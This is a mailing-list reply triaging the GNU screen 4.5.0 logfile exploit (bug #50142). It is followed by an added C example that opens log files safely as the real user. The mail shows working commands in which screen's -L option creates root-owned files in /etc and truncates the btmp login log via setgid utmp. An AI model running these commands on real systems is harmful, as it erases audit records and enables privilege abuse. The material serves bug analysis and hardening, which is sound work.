Re: [screen-devel] [bug #50142] root exploit 4.5.0
From: Axel Beckert
Subject: Re: [screen-devel] [bug #50142] root exploit 4.5.0
Date: Tue, 24 Jan 2017 21:30:55 +0100
User-agent: Mutt/1.5.21 (2010-09-15)
Hi,
not replying on Savannah as I don't yet get the exact impact of this.
On Tue, Jan 24, 2017 at 07:05:10PM +0000, anonymous wrote:
> > address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> > address@hidden:/etc (master)$ ls -l bla.bla
> > -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> > address@hidden:/etc (master)$ cat bla.bla
> > fail
> > address@hidden:/etc (master)$
On Debian Unstable this does not work as a root exploit as screen does
not run setuid. screen nevertheless runs setgid with group utmp:
-rwxr-sr-x 1 root utmp 457608 Jan 18 16:54 /usr/bin/screen*
So I'm able to gain access to /var/log/{btmp,wtmp,lastlog}*.
I though can't really write to it, just erase it:
/var/log → id
uid=1000(abe) gid=1000(abe)
groups=1000(abe),4(adm),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev),113(kvm)
/var/log → ls -l btmp.1
-rw-rw---- 1 root utmp 384 Dec 24 17:03 btmp.1
/var/log → screen -D -m -L btmp.1 echo fail
/var/log → ls -l btmp.1
-rw-rw---- 1 root utmp 0 Jan 24 21:06 btmp.1
So in my case nothing got written into the file (trying an existing
file without write permissions to the according directory).
Running the same game in /var/run/screen which is group-writable for
utmp, I though can reproduce this a little bit better:
/var/run/screen → ls -l
total 0
drwx------ 2 abe abe 40 Jan 24 21:17 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
/var/run/screen → screen -D -m -L bla.bla echo fail
/var/run/screen → ls -l
total 4
drwx------ 2 abe abe 40 Jan 24 21:20 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
-rw-r--r-- 1 abe utmp 6 Jan 24 21:20 bla.bla
/var/run/screen → cat bla.bla
fail
/var/run/screen →
Am I right that, since screen later drops the set[ug]id rights, this
only works if the file is newly created because then it is created
with such permissions that I can later write into it without
set[ug]id?
Kind regards, Axel
--
/~\ Plain Text Ribbon Campaign | Axel Beckert
\ / Say No to HTML in E-Mail and News | address@hidden (Mail)
X See http://www.nonhtmlmail.org/campaign.html | address@hidden (Mail+Jabber)
/ \ I love long mails: http://email.is-not-s.ms/ | http://abe.noone.org/ (Web)
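The question at the end of the mail, why a newly created log file is later writable while an existing root:utmp one is only truncated, comes down to which identity the kernel checks at open() time. As an added example that is not from the mail or from screen's source, here is the hardened shape of that step in C: the log path is opened only with the real user's effective ids, appended to rather than truncated, and the routine fails closed if the saved identity cannot be restored. The default path /tmp/screen_log_example.txt is a constructed placeholder.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a user-supplied log path as the invoking (real) user, not as the
 * set[ug]id identity, so the kernel applies the caller's own rights to both
 * creating a new file and writing an existing one.  Returns fd or -1. */
int open_log_as_real_user(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;
    /* Drop the effective ids (gid first, while uid may still be 0).  In an
     * unprivileged process they already equal the real ids: a no-op. */
    if (setegid(getgid()) == -1 || seteuid(getuid()) == -1)
        return -1;
    /* Append, never truncate: a writability probe that truncates would leave
     * a 0-byte btmp.1 like the one in the mail.  O_NOFOLLOW refuses a symlink. */
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    saved_errno = errno;
    /* Regain the saved identity; if that is impossible, fail closed. */
    if (seteuid(saved_euid) == -1 || setegid(saved_egid) == -1) {
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* 1 if the file behind fd is owned by the real user, 0 otherwise. */
int log_owned_by_real_user(int fd)
{
    struct stat st;
    return fstat(fd, &st) == 0 && st.st_uid == getuid();
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/tmp/screen_log_example.txt";
    int fd = open_log_as_real_user(path);      /* constructed demo path */
    if (fd == -1) { perror(path); return 1; }  /* e.g. EACCES on a root:utmp 0660 file */
    printf("%s owned by real user: %s\n", path, log_owned_by_real_user(fd) ? "yes" : "no");
    return close(fd);
}
```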